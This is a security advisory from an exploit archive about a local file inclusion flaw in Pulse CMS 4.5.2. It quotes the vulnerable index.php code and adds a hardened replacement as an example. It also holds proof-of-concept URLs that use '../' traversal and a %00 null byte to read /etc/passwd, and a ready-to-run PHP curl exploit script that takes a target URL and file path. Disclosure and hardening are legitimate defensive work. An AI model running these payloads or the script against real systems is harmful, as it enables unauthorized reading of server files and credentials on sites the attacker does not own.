Pulse CMS 4.5.2 Local File Inclusion



EKU-ID: 5427 CVE: OSVDB-ID:
Author: Ehsan Hosseini Published: 2016-03-01 Verified: Verified


Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion


References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt


Release Date:
=============
2016-02-28


Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content
managed website. Since it's a flat file CMS there is no complicated
database setup, just copy it to your server and go.
(https://www.pulsecms.com/)


Software Link:
==============
http://www.pulsecms.com/download/pulse.zip


Vulnerability Type:
===================
Local File Inclusion


Vulnerability Details:
======================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High

Vulnerable File & Code:
=======================
index.php (line numbers from the advisory stripped)
$page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
// htmlspecialchars() only escapes &, <, >, " and ' for HTML output; it leaves
// "." and "/" untouched, so "../" sequences survive into the file path.
$page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');

// When the request contains a slash this only appends "home" if
// content/pages/<page>home.txt exists; nothing restricts $page to the
// pages directory.
if (preg_match("/\//", $page)){
	if(file_exists("content/pages/".$page."home.txt")){
		$page = $page."home";
	}
}
// ... (intervening lines not shown in the advisory)
// User-controlled $page reaches include() with only ".txt" appended, so
// traversal reads any .txt file the web server can open; a %00 in $page
// truncated the path and dropped the suffix on PHP versions before 5.3.4.
include("content/pages/$page.txt");
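A hardened version of the page lookup, added here as an example (not Pulse CMS code): it allow-lists the page name and confines the resolved path to content/pages before the include. It assumes the same layout (content/pages/<name>.txt, default page "home") and PHP 7.1 or newer.

```php
<?php
// Added example, not Pulse CMS code: a hardened replacement for the page
// lookup quoted above. Assumes the same layout (content/pages/<name>.txt,
// default page "home") and PHP 7.1 or newer.

const PAGES_DIR = __DIR__ . '/content/pages';

// Return the absolute path of the requested page's .txt file, or null if the
// name is not an allowed slug or the resolved file lies outside PAGES_DIR.
function resolve_page(string $requested): ?string
{
    // Allow-list: one slug, optionally one sub-directory level ("blog/post")
    // or a directory reference with trailing slash ("blog/"). "\z" anchors at
    // the true end of the string so a trailing newline cannot slip past "$".
    if (!preg_match('~^[A-Za-z0-9_-]+(/[A-Za-z0-9_-]*)?\z~', $requested)) {
        return null;
    }
    // Keep Pulse's convention that "blog/" serves blog/home.txt.
    if (substr($requested, -1) === '/') {
        $requested .= 'home';
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.txt');
    // realpath() returns false for missing files and collapses any symlink or
    // ".." component; the prefix test keeps the file inside PAGES_DIR even if
    // the allow-list above is ever loosened.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Reject arrays (?p[]=x) and empty values; never pass raw input to the filesystem.
$raw  = $_GET['p'] ?? 'home';
$page = (is_string($raw) && $raw !== '') ? $raw : 'home';

$file = resolve_page($page);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
// Escape for HTML only at output time (e.g. in the template), never before
// the filesystem lookup, where it gives no protection.
$title = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
include $file;
```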

Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php

-- To include other file types, use a null byte (%00) --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php

PHP Exploit
<?php
# Pulse CMS 4.5.2 - Local File Inclusion (index.php)
# Usage: php exploit.php <base-url-with-trailing-slash> <path>

if ($argc < 3) {
    fwrite(STDERR, "Usage: php {$argv[0]} <base-url-with-trailing-slash> <path>\n");
    exit(1);
}
$target = $argv[1];   // base URL of the Pulse install, ending in "/"
$file   = $argv[2];   // path sent as the "p" parameter

echo "Pulse CMS 4.5.2 - Local File Inclusion\n";
echo "Author : Ehsan Hosseini\n\n\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// %00 is sent literally so the null byte truncates the appended ".txt"
curl_setopt($ch, CURLOPT_URL, $target . 'index.php?p=' . $file . "%00.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$ex = curl_exec($ch);
if ($ex === false) {
    fwrite(STDERR, "Request failed: " . curl_error($ch) . "\n");
}
curl_close($ch);
unset($ch);

echo $ex;
?>

Author:
=======
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/


Special thanks to:
==================
Bl4ck_mohajem


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir